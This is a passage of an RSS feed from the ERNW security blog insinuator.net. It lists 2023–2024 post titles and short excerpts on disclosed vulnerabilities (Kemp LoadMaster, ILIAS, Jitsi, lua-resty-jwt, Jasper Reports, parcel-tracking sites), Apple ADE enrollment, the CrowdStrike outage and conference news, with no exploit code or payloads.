      <description>&lt;p&gt;Hey everybody,&lt;/p&gt;&#xA;&lt;p&gt;during a recent Red Teaming engagement Marius Walter from &lt;a href=&#34;https://ernw.de/&#34;&gt;ERNW&lt;/a&gt; found a command injection issue in Progress (Kemp) LoadMaster. It was registered as &lt;a href=&#34;https://www.cve.org/CVERecord?id=CVE-2024-7591&#34;&gt;CVE-2024-7591&lt;/a&gt; and scores a CVSS of 10.0.&lt;/p&gt;&#xA;&lt;p&gt;The vendor already has patches out, make sure to apply them as this is a high severe issue. You can find the official announcement and the patch references on the &lt;a href=&#34;https://support.kemptechnologies.com/hc/en-us/articles/29196371689613-LoadMaster-Security-Vulnerability-CVE-2024-7591&#34;&gt;official support page&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Marius will follow up with a technical blog post on this issue once we think everybody had a realistic chance of applying the patches.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Potential Limitations of Apple ADE in Corporate Usage Scenarios</title>
      <link>https://insinuator.net/2024/09/disclosure-potential-limitations-of-apple-ade-in-corporate-usage-scenarios/</link>
      <pubDate>Tue, 03 Sep 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/09/disclosure-potential-limitations-of-apple-ade-in-corporate-usage-scenarios/</guid>
      <description>&lt;p&gt;Apple Automated Device Enrollment (ADE) is presented as a way to automate and simplify the enrollment process of Apple devices within Mobile Device Management (MDE) solutions. This blog post is aimed at organizations currently planning or even already using this feature and making you, the reader, aware of potential limitations of this process that might otherwise not be clearly addressed in your companies’ device management process.&lt;/p&gt;&#xA;&lt;h2 id=&#34;how-apple-ade-is-presented&#34;&gt;How Apple ADE Is Presented&lt;/h2&gt;&#xA;&lt;p&gt;Looking at the Apple Support pages today, Automated Device Enrollment is described as a process that&lt;/p&gt;</description>
    </item>
    <item>
      <title>CrowdStrike: What is the worldwide BSOD all about?</title>
      <link>https://insinuator.net/2024/08/crowdstrike-what-is-the-worldwide-bsod-all-about/</link>
      <pubDate>Tue, 20 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/08/crowdstrike-what-is-the-worldwide-bsod-all-about/</guid>
      <description>&lt;p&gt;&lt;em&gt;This article is about the massive BSOD triggered by CrowdStrike worldwide on July 19. Analysis and information from CrowdStrike or other sources are regularly published, completing what is expressed here. Updates may also be provided in the future.&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;Friday, July 19, is a day to be remembered in computing history as the day of one of the biggest BSODs (Blue Screens of Death). We have seen air traffic come to a standstill over the USA and people climbing ladders with USB sticks to update giant screens. The impact was still measurable over many days. The question on everyone’s lips is how that all happened. CrowdStrike provided, on a regular basis, an explanation for people to understand what happened. But explanations can be hard to understand, especially for one who would like to read directly within CrowdStrike’s internal wording in their publications and regarding technical driver implementation details. Also, the analysis misses some points we consider relevant for secure software development. This article discusses conclusions from this massive crash, especially the necessity to change our mindset about software. This means we should understand, document, and evaluate independently software provided by vendors to know exactly what we install on our systems and to figure out the risk that may be taken by using the software. The time of naive belief in software magic must end with a third party’s independent review of the software, analysing its reliability, security, and stability. This is an activity we have been doing at ERNW for years, especially for e.g. the German Federal Office for Information Security (BSI)&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Disclosure: Apple ADE – Network Based Provisioning Bypass</title>
      <link>https://insinuator.net/2024/08/disclosure-apple-ade-network-based-provisioning-bypass/</link>
      <pubDate>Fri, 09 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/08/disclosure-apple-ade-network-based-provisioning-bypass/</guid>
      <description>&lt;p&gt;Mobile Device Management (MDM) solutions are used to centrally manage mobile devices in corporate environments. This includes the monitoring of the device, automatic installation/removal of apps or certificates and restrict the functionality. Even though MDM solutions exist for multiple vendors, we will look specifically on Apple devices enrolled via Intune. When an Apple device is registered for Automated Device Enrollment (ADE), it will automatically download and apply these policies during the initial setup and prior to the first boot.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BMBF UNCOVER – Monitoring von Sicherheitsvorfällen in Fahrzeugen</title>
      <link>https://insinuator.net/2024/06/bmbf-uncover-monitoring-von-sicherheitsvorf%C3%A4llen-in-fahrzeugen/</link>
      <pubDate>Fri, 21 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/06/bmbf-uncover-monitoring-von-sicherheitsvorf%C3%A4llen-in-fahrzeugen/</guid>
      <description>&lt;h4 id=&#34;english-abstract&#34;&gt;English Abstract&lt;/h4&gt;&#xA;&lt;p&gt;For the realization and introduction of autonomous vehicles, the safe interaction of functions, systems and services as well as their monitoring over the entire product life cycle is essential. An exclusive security-by-design approach is no longer sufficient and must be continuously supported by feedback obtained from in-the-wild operation. This is where the recently successfully completed joint project BMBF UNCOVER comes into play, which targets the requirements of the standards &lt;em&gt;ISO/SAE 21434 (Road vehicles – Cybersecurity engineering)&lt;/em&gt; and &lt;em&gt;ISO 21448 (Road vehicles – Safety of the intended functionality (SOTIF))&lt;/em&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS24 Agenda Preview: Active Directory &amp; Entra ID Security Track</title>
      <link>https://insinuator.net/2024/06/troopers24-agenda-preview-active-directory-entra-id-security-track/</link>
      <pubDate>Fri, 14 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/06/troopers24-agenda-preview-active-directory-entra-id-security-track/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;are you curious about the agenda of the Active Directory- &amp;amp; Entra ID security track at TROOPERS24? Here’s a sneak peak of the already published tracks:&lt;/p&gt;&#xA;&lt;h3 id=&#34;wednesday-2024-06-26&#34;&gt;Wednesday, 2024-06-26:&lt;/h3&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/vxs8wy&#34;&gt;A Decade of Active Directory Attacks: What We’ve Learned &amp;amp; What’s Next&lt;/a&gt; – Sean Metcalf&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/uepkle&#34;&gt;ADillesHeel: Making the Impossible Possible in AD Attack Path Analysis&lt;/a&gt; – SHANG-DE JIANG&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/jt97ha&#34;&gt;So You Performed A Forest Recovery. How Do You Reconnect Your AD Again With Azure AD?&lt;/a&gt; – Jorge de Almeida Pinto&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/8ekvxr&#34;&gt;Decrypting the Directory: A Journey into a static analysis of the Active Directory NTDS to identify misconfigurations and vulnerabilities&lt;/a&gt; – Bastien Cacace (XMCO company)&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/a8zf7h&#34;&gt;Say Hello to your new cache flow!&lt;/a&gt; – Geoffrey Bertoli, Rémi Jullian&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/kzymd8&#34;&gt;Analyzing and Executing ADCS Attack Paths with BloodHound&lt;/a&gt; – by Andy Robbins, Jonas Bülow Knudsen&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h3 id=&#34;thursday-2024-06-27&#34;&gt;Thursday, 2024-06-27:&lt;/h3&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/kynuwx&#34;&gt;The (almost) complete LDAP guide&lt;/a&gt; – Sapir Federovsky&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/z3dexp&#34;&gt;Exploiting Token-Based Authentication: Attacking and Defending Identities in the 2020s&lt;/a&gt; – Dr Nestori Syynimaa&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/3vlccy&#34;&gt;Attacking Primary Refresh Tokens using their MacOS implementation&lt;/a&gt; – Olaf Hartong, Dirk-jan Mollema&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/nvp3zs&#34;&gt;Misconfiguration Manager: Overlooked and Overprivileged&lt;/a&gt; – Duane Michael, Chris Thompson&lt;/li&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://troopers.de/troopers24/talks/jlaupj&#34;&gt;The Registry Rundown&lt;/a&gt; – Cedric Van Bockhaven, Max Grim&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The full conference agenda including timeslots will be published soon at &lt;a href=&#34;https://troopers.de/troopers24/conference/&#34;&gt;TROOPERS24&lt;/a&gt;. The trainings are already sold out, but &lt;a href=&#34;https://troopers.de/tickets/&#34;&gt;a handful of tickets is currently left&lt;/a&gt;.  Stay tuned &amp;amp; make the world a safer place!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisory: Achieving PHP Code Execution in ILIAS eLearning LMS before v7.30/v8.11/v9.1</title>
      <link>https://insinuator.net/2024/05/security-advisory-achieving-php-code-execution-in-ilias-elearning-lms-before-v7.30/v8.11/v9.1/</link>
      <pubDate>Wed, 22 May 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/05/security-advisory-achieving-php-code-execution-in-ilias-elearning-lms-before-v7.30/v8.11/v9.1/</guid>
      <description>&lt;p&gt;During my Bachelor’s thesis, I identified several XSS vulnerabilities and a PHP Code Execution vulnerability via an insecure file upload in the learning management system (LMS) ILIAS. The XSS vulnerability can be chained with the code execution vulnerability so that attackers with tutor privileges in at least one course can perform this exploit chain.&lt;/p&gt;&#xA;&lt;p&gt;The Bachelor’s thesis was motivated by the ever-increasing number of compromised universities in Germany&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;^(,)&lt;sup id=&#34;fnref:2&#34;&gt;&lt;a href=&#34;#fn:2&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;2&lt;/a&gt;&lt;/sup&gt;^(,)&lt;sup id=&#34;fnref:3&#34;&gt;&lt;a href=&#34;#fn:3&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;3&lt;/a&gt;&lt;/sup&gt;^(,)&lt;sup id=&#34;fnref:4&#34;&gt;&lt;a href=&#34;#fn:4&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;4&lt;/a&gt;&lt;/sup&gt;^(,)&lt;sup id=&#34;fnref:5&#34;&gt;&lt;a href=&#34;#fn:5&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;5&lt;/a&gt;&lt;/sup&gt;. The thesis analyzed the importance of LMS systems in that context, as those services are often exposed to the internet.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Linux Character Devices: Exploring systemd-run and pkexec</title>
      <link>https://insinuator.net/2024/05/linux-character-devices-exploring-systemd-run-and-pkexec/</link>
      <pubDate>Tue, 14 May 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/05/linux-character-devices-exploring-systemd-run-and-pkexec/</guid>
      <description>&lt;p&gt;In this blog post, we quickly look into issues involving character devices. As is typical for Linux, everything is a file, so character devices are referenced as files, such as pseudo terminals (pts) under &lt;code&gt;/dev/pts/&lt;/code&gt;. &lt;code&gt;man pty&lt;/code&gt; briefly introduces the topic. Essentially, it is used to connect a program, such as a terminal emulator, to a shell. In the end, a pty can read and write like a regular file. A colleague already brought up the topic of ptys and character devices. But more recently a &lt;a href=&#34;https://twitter.com/hackerschoice/status/1787601814021361729&#34;&gt;Twitter post&lt;/a&gt; and the &lt;a href=&#34;https://github.com/hackerhouse-opensource/exploits/blob/master/systemd-run-tty.txt&#34;&gt;accompanying advisory&lt;/a&gt; piqued my interest.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Is Google Play Protect a Reliable Malware Detector?</title>
      <link>https://insinuator.net/2024/05/is-google-play-protect-a-reliable-malware-detector/</link>
      <pubDate>Fri, 03 May 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/05/is-google-play-protect-a-reliable-malware-detector/</guid>
      <description>&lt;p&gt;Google Play Protect is a built-in Android solution that enhances devices’ security. Its main job is to detect and block malware on Android devices. Several malware families were known for bypassing Play Protect checks in recent years. This brings us to an important question: “Is Google Play Protect a Reliable Malware Detector?”. This blog post shows how Play Protect deals with various Android malware in different scenarios. I deal with Play Protect as a black box.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerability in Jitsi Meet: Meeting Password Disclosure affecting Meetings with Lobbies</title>
      <link>https://insinuator.net/2024/05/vulnerability-in-jitsi-meet-meeting-password-disclosure-affecting-meetings-with-lobbies/</link>
      <pubDate>Thu, 02 May 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/05/vulnerability-in-jitsi-meet-meeting-password-disclosure-affecting-meetings-with-lobbies/</guid>
      <description>&lt;p&gt;During a customer project, we identified a logic flaw in &lt;a href=&#34;https://jitsi.org/&#34;&gt;Jitsi Meet&lt;/a&gt;, an open-source video conferencing and messaging platform for secure video conferencing, voice calls, and messaging. The vulnerability affects password protected Jitsi meetings that make use of a lobby. This logic flaw leads to the disclosure of the meeting password when a user is invited to the call after waiting in the lobby.&lt;/p&gt;&#xA;&lt;p&gt;Jitsi offers two security options to meeting moderators. Firstly, the meeting can be assigned a password that must be entered when joining. Secondly, a lobby mode can be activated, which first adds joining users to a lobby, from where they can then be added to the meeting by a user with moderation permissions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Breaking GLS Parcel Tracking</title>
      <link>https://insinuator.net/2024/04/breaking-gls-parcel-tracking/</link>
      <pubDate>Thu, 25 Apr 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/04/breaking-gls-parcel-tracking/</guid>
      <description>&lt;p&gt;Recently, we held a talk at the Winterkongress&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt; of the &lt;em&gt;Digitale Gesellschaft Schweiz&lt;/em&gt; in Winterthur, Switzerland, about our research project on breaking German parcel tracking sites. We could not name all the parcel services for which we identified vulnerabilities respecting disclosure timelines. Today, we describe our findings at GLS, another player in the German parcel market, and the disclosure process of corresponding vulnerabilities.&lt;/p&gt;&#xA;&lt;h1 id=&#34;findings&#34;&gt;Findings&lt;/h1&gt;&#xA;&lt;p&gt;Similar to the vulnerabilities previously disclosed for DHL&lt;sup id=&#34;fnref:2&#34;&gt;&lt;a href=&#34;#fn:2&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;2&lt;/a&gt;&lt;/sup&gt; and DPD&lt;sup id=&#34;fnref:3&#34;&gt;&lt;a href=&#34;#fn:3&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;3&lt;/a&gt;&lt;/sup&gt;, and UPS&lt;sup id=&#34;fnref:4&#34;&gt;&lt;a href=&#34;#fn:4&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;4&lt;/a&gt;&lt;/sup&gt;, we identified that the GLS parcel tracking website discloses the recipient’s geographic area by showing the name of the destination parcel center. Furthermore, the recipient’s ZIP code was used to unlock personal information (including the exact coordinates of the address) and features that influence the parcel delivery process. The website did not implement rate-limiting or other techniques to prevent brute-forcing ZIP codes using the API.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BSI Publishes Windows 10 SiSyPHuS Reports: Application Compatibility Infrastructure, Microsoft Defender Antivirus ETW Usage and Device Setup Manager Service</title>
      <link>https://insinuator.net/2024/04/bsi-publishes-windows-10-sisyphus-reports-application-compatibility-infrastructure-microsoft-defender-antivirus-etw-usage-and-device-setup-manager-service/</link>
      <pubDate>Tue, 16 Apr 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/04/bsi-publishes-windows-10-sisyphus-reports-application-compatibility-infrastructure-microsoft-defender-antivirus-etw-usage-and-device-setup-manager-service/</guid>
      <description>&lt;p&gt;The German Federal Office for Information Security (BSI – Bundesamt für Sicherheit in der Informationstechnik) has published several papers ERNW created as part of the long-term &lt;a href=&#34;https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Studien/SiSyPHuS_Win10/SiSyPHuS_node.html&#34;&gt;SiSyPHuS Win10-Project&lt;/a&gt;. This project focuses on system analysis of selected parts of the Windows 10 operating system performed by ERNW.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Studien/SiSyPHuS_Win10/AP3/SiSyPHuS_AP3_node.html&#34;&gt;Analysis of the Application Compatibility Infrastructure (ACI)&lt;/a&gt;: In this work we present an overview of the ACI technology along with a technical analysis of the compatibility protocol which is used first to determine if a compatibility solution needs to be applied, and second, to apply said compatibility solution. Furthermore, threats and mitigation in the context of the technology are presented a long with a monitoring approach. Finally, configuration and logging capabilities are discussed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Breaking UPS Parcel Tracking</title>
      <link>https://insinuator.net/2024/04/breaking-ups-parcel-tracking/</link>
      <pubDate>Wed, 10 Apr 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/04/breaking-ups-parcel-tracking/</guid>
      <description>&lt;p&gt;Today, we describe our findings at United Parcel Service of America, Inc. (UPS), another German parcel market player, and the corresponding vulnerabilities’ disclosure process.&lt;/p&gt;&#xA;&lt;h1 id=&#34;findings&#34;&gt;Findings&lt;/h1&gt;&#xA;&lt;p&gt;Only a valid tracking number is needed to get the personal information of a parcel’s receiver, including the sender’s location, the recipient’s name, and the recipient’s location (city and country). It was possible to enumerate numerous tracking numbers during testing by iterating from known ones. Since the last digit of a tracking number is a checksum, it can be calculated. Also, certain businesses have a predefined prefix in their tracking numbers. This schema allows the enumeration of every parcel sent from a particular business.&lt;/p&gt;</description>
    </item>
    <item>
      <title>I know what you ordered last summer @ Winterkongress 2024</title>
      <link>https://insinuator.net/2024/04/i-know-what-you-ordered-last-summer-@-winterkongress-2024/</link>
      <pubDate>Wed, 03 Apr 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/04/i-know-what-you-ordered-last-summer-@-winterkongress-2024/</guid>
      <description>&lt;p&gt;Dennis and I already published blog posts about our research project dealing with vulnerabilities in parcel tracking implementations at &lt;a href=&#34;https://insinuator.net/2023/07/all-your-parcel-are-belong-to-us-talk-at-troopers-2023/&#34;&gt;DHL&lt;/a&gt; and &lt;a href=&#34;https://insinuator.net/2023/09/breaking-dpd-parcel-tracking/&#34;&gt;DPD&lt;/a&gt;. At the &lt;a href=&#34;https://cfp.winterkongress.ch/wk24/schedule/&#34;&gt;&lt;em&gt;Winterkongress&lt;/em&gt;&lt;/a&gt; (winter congress) in Winterthur, Switzerland, we had the great opportunity to give a talk about the matter. The talk was recorded and can be watched &lt;a href=&#34;https://media.ccc.de/v/dgwk2024-56194-ich-wei-was-du-letzten-so&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://digitale-gesellschaft.ch&#34;&gt;&lt;em&gt;DigiGes&lt;/em&gt;&lt;/a&gt; held the Winterkongress, which took place in Winterthur on 01.03. till 02.03.2024. The main topics are ethics, threats, and opportunities of IT. This year, many talks looked at AI in some way.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Considerations on AI-Security – Part I: Introduction and Nondeterminism</title>
      <link>https://insinuator.net/2024/02/considerations-on-ai-security-part-i-introduction-and-nondeterminism/</link>
      <pubDate>Tue, 06 Feb 2024 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2024/02/considerations-on-ai-security-part-i-introduction-and-nondeterminism/</guid>
      <description>&lt;p&gt;Hey there!&lt;/p&gt;&#xA;&lt;p&gt;This is the first blog post in a series about issues we think are currently relevant in the field of AI-Security. The intention is not to get full coverage of the topic, but to point out things that seem practical and relevant. We will base some of our statements on lab setups and real-life examples. The technology that we will focus on is chat bots based on generative AI, mainly OpenAI’s ChatGPT. Right now, this specific application of AI in the wild seems to be the best way to demonstrate issues and pitfalls when it comes to IT security.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Student Project - Audit Framework</title>
      <link>https://insinuator.net/2023/10/student-project-audit-framework/</link>
      <pubDate>Fri, 20 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/10/student-project-audit-framework/</guid>
      <description>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;In 2021, &lt;a href=&#34;https://www.ernw.de&#34;&gt;ERNW&lt;/a&gt; collaborated with&#xA;&lt;a href=&#34;https://www.hs-mannheim.de&#34;&gt;Hochschule Mannheim&lt;/a&gt; for their CEP (Cyber Security&#xA;Entwicklungsprojekt) to build an auditing framework for testing operating system&#xA;configurations against security procedures. This project is part of the&#xA;education program of the university to give the students the chance to utilize&#xA;the knowledge gained throughout the first semesters in a real world project.&#xA;ERNW posed as the fictitious customer, providing a requirements document and&#xA;regular meetings with all project groups for feedback. We planned to process and&#xA;adapt the results for an open source auditing framework. Unfortunately, we were&#xA;not able to finish this project yet, but we think the students should get some&#xA;attention for their work independent from our side. So here is a short summary&#xA;of what the students created and the corresponding repositories.&lt;/p&gt;</description>
    </item>
    <item>
      <title>c0c0n 2023 – A Short Retrospective</title>
      <link>https://insinuator.net/2023/10/c0c0n-2023-a-short-retrospective/</link>
      <pubDate>Tue, 17 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/10/c0c0n-2023-a-short-retrospective/</guid>
      <description>&lt;p&gt;Two weeks ago, I was at the &lt;a href=&#34;https://india.c0c0n.org/2023/&#34;&gt;c0c0n&lt;/a&gt; conference in&#xA;Cochin (India). This conference is quite special for at least two&#xA;considerations. At first, this is – to the best of my knowledge – one of the few&#xA;conferences which officially brings together hackers, industrials, politics, and&#xA;security forces. This is not always obvious for all these different persons to&#xA;talk together, may be due to a lack of mutual understanding ?. But for a couple&#xA;of days, all of them meet, talk, exchange, and they share mutual needs and&#xA;appropriate solutions. And this may explain the second consideration, why c0c0n&#xA;is one of the oldest cyber security conferences in India (more than 15 years).&#xA;And yes, this is the conference where police forces directly pick you up from&#xA;the gates of your plane at airport, sitting you at the back of a police car to&#xA;drive you to your hotel with emergency lights ?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Lua-Resty-JWT Authentication Bypass</title>
      <link>https://insinuator.net/2023/10/lua-resty-jwt-authentication-bypass/</link>
      <pubDate>Tue, 10 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/10/lua-resty-jwt-authentication-bypass/</guid>
      <description>&lt;p&gt;I was writing some challenges for PacketWars at&#xA;&lt;a href=&#34;https://troopers.de/&#34;&gt;TROOPERS22&lt;/a&gt;. One was intended to be a JWT key confusion&#xA;challenge where the public key from an RSA JWT should be recovered and used to&#xA;sign a symmetric JWT. For that, I was searching for a library vulnerable to JWT&#xA;key confusion by default and found &lt;em&gt;lua-resty-jwt&lt;/em&gt;. The original repository by&#xA;&lt;em&gt;SkyLothar&lt;/em&gt; is not maintained and different from the library that is installed&#xA;with the LuaRocks package manager. The investigated library is a&#xA;&lt;a href=&#34;https://github.com/cdbattags/lua-resty-jwt&#34;&gt;fork&lt;/a&gt; of the original repository,&#xA;maintained by &lt;em&gt;cdbattags&lt;/em&gt; in version 0.2.3 and was downloaded more than&#xA;&lt;a href=&#34;https://luarocks.org/modules/cdbattags/lua-resty-jwt&#34;&gt;4.8 million times&lt;/a&gt;&#xA;according to LuaRocks.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Breaking DPD Parcel Tracking</title>
      <link>https://insinuator.net/2023/09/breaking-dpd-parcel-tracking/</link>
      <pubDate>Tue, 12 Sep 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/09/breaking-dpd-parcel-tracking/</guid>
      <description>&lt;p&gt;This blog post is the continuation of our parcel research. We already reported&#xA;about how we broke parcel tracking at&#xA;&lt;a href=&#34;https://insinuator.net/2023/07/all-your-parcel-are-belong-to-us-talk-at-troopers-2023/&#34;&gt;DHL&lt;/a&gt;&#xA;and the disclosure process of the identified problems. As DHL is not the only&#xA;parcel service in Germany, we also investigated the other available parcel&#xA;services. In this blog post, we want to talk about DPD, also called Geopost,&#xA;which belongs to the French Post Office.&lt;/p&gt;&#xA;&lt;h2 id=&#34;efficient-guessing-of-tracking-numbers&#34;&gt;Efficient Guessing of Tracking Numbers&lt;/h2&gt;&#xA;&lt;p&gt;DPD uses the recipient’s ZIP code to unlock detailed shipment information and&#xA;additional options. After trying some ZIP codes manually, we received CAPTCHA&#xA;prompts in the web interface (more on this later).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Identification of (malicious) modifications in memory-mapped image files</title>
      <link>https://insinuator.net/2023/09/identification-of-malicious-modifications-in-memory-mapped-image-files/</link>
      <pubDate>Wed, 06 Sep 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/09/identification-of-malicious-modifications-in-memory-mapped-image-files/</guid>
      <description>&lt;p&gt;I’m happy to announce the publication of the paper&#xA;&lt;a href=&#34;https://dfrws.org/wp-content/uploads/2023/07/block-windowsmemoryforensics.pdf&#34;&gt;Windows memory forensics: Identification of (malicious) modifications in memory-mapped image files&lt;/a&gt;&#xA;at this years DFRWS USA, and the release of the corresponding&#xA;&lt;a href=&#34;https://github.com/f-block/volatility-plugins#imgmalfind&#34;&gt;volatility plugin&lt;/a&gt;.&#xA;With this research came also an update to the Ptenum family (affecting&#xA;especially the &lt;code&gt;ptemalfind&lt;/code&gt; plugin), which makes the plugins reliable in&#xA;identifying modified pages despite memory combining, so make sure to grab the&#xA;newest version from the Github repository.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Select * from OpenStack - A Steampipe Plugin for OpenStack</title>
      <link>https://insinuator.net/2023/08/select-from-openstack-a-steampipe-plugin-for-openstack/</link>
      <pubDate>Wed, 02 Aug 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/08/select-from-openstack-a-steampipe-plugin-for-openstack/</guid>
      <description>&lt;p&gt;Although, more and more companies start to move their IT-Infrastructure from&#xA;on-premise to public cloud solutions like Amazon Web Services (AWS) and&#xA;Microsoft Azure, public cloud providers are not an option for every&#xA;organization. This is where private cloud platforms come into play as they give&#xA;organizations direct control over their information, can be more energy&#xA;efficient than other on-premise hosting solutions, and offer companies the&#xA;possibility to manage their data centers efficiently.&#xA;&lt;a href=&#34;https://www.openstack.org/&#34;&gt;OpenStack&lt;/a&gt; is a widely deployed, open-source&#xA;private cloud platform many companies and universities use.&lt;/p&gt;</description>
    </item>
    <item>
      <title>All your parcel are belong to us – Talk at Troopers 2023</title>
      <link>https://insinuator.net/2023/07/all-your-parcel-are-belong-to-us-talk-at-troopers-2023/</link>
      <pubDate>Tue, 11 Jul 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/07/all-your-parcel-are-belong-to-us-talk-at-troopers-2023/</guid>
      <description>&lt;p&gt;At Troopers 2023, we gave a talk on how to attack DHL parcel tracking&#xA;information based on OSINT. Since we previously had an exemplary disclosure&#xA;process about this attack with DHL, Mr. Kiehne (from DHL) joined us to provide&#xA;interesting background information and insights on how they addressed our&#xA;findings.&lt;/p&gt;&#xA;&lt;p&gt;We want to thank DHL and especially Mr. Kiehne for sharing those insights with&#xA;us at Troopers 2023. It is the ideal case, but still not common that&#xA;organizations talk openly about their actions and views on a disclosure process.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The DRACO Stream Cipher</title>
      <link>https://insinuator.net/2023/06/the-draco-stream-cipher/</link>
      <pubDate>Wed, 21 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/06/the-draco-stream-cipher/</guid>
      <description>&lt;p&gt;In symmetric-key cryptography, we typically distinguish two types of encryption&#xA;schemes: block ciphers and stream ciphers. Block ciphers divide a plaintext into&#xA;blocks of a fixed size (e.g., 64 or 128 bits) and encrypt one such block of data&#xA;as a whole. Stream ciphers, on the other hand, consider the plaintext as a&#xA;continuous stream of data. The stream cipher maintains an internal state and in&#xA;each step it outputs one bit or several bits and updates its internal state. The&#xA;output bit stream is then combined with the plaintext, usually using the XOR&#xA;operation. One advantage of stream ciphers is that their resource requirements&#xA;are lower than those of block ciphers in many application scenarios. This makes&#xA;them particularly useful in lightweight cryptography targeting resource&#xA;constrained devices such as low-cost RFID tags.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Jasper Reports Library Code Injection</title>
      <link>https://insinuator.net/2023/06/jasper-reports-library-code-injection/</link>
      <pubDate>Tue, 13 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2023/06/jasper-reports-library-code-injection/</guid>
      <description>&lt;p&gt;During the past year we had several projects where our target application used&#xA;&lt;a href=&#34;https://community.jaspersoft.com/&#34;&gt;Jasper Reports&lt;/a&gt; in some way. In a few of the&#xA;cases we found an API that offered to render a template along with some&#xA;arguments into a PDF file. This was done with the help of the Jasper Reports&#xA;Java library. Due to the way the library and the expression mechanism works,&#xA;this endpoint gave us the possibility to inject Java code and gain remote code&#xA;execution on the target systems.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IMF Conference 2023 in Munich</title>
      <link>https://insinuator.net/2023/05/imf-conference-2023-in-munich/</link>
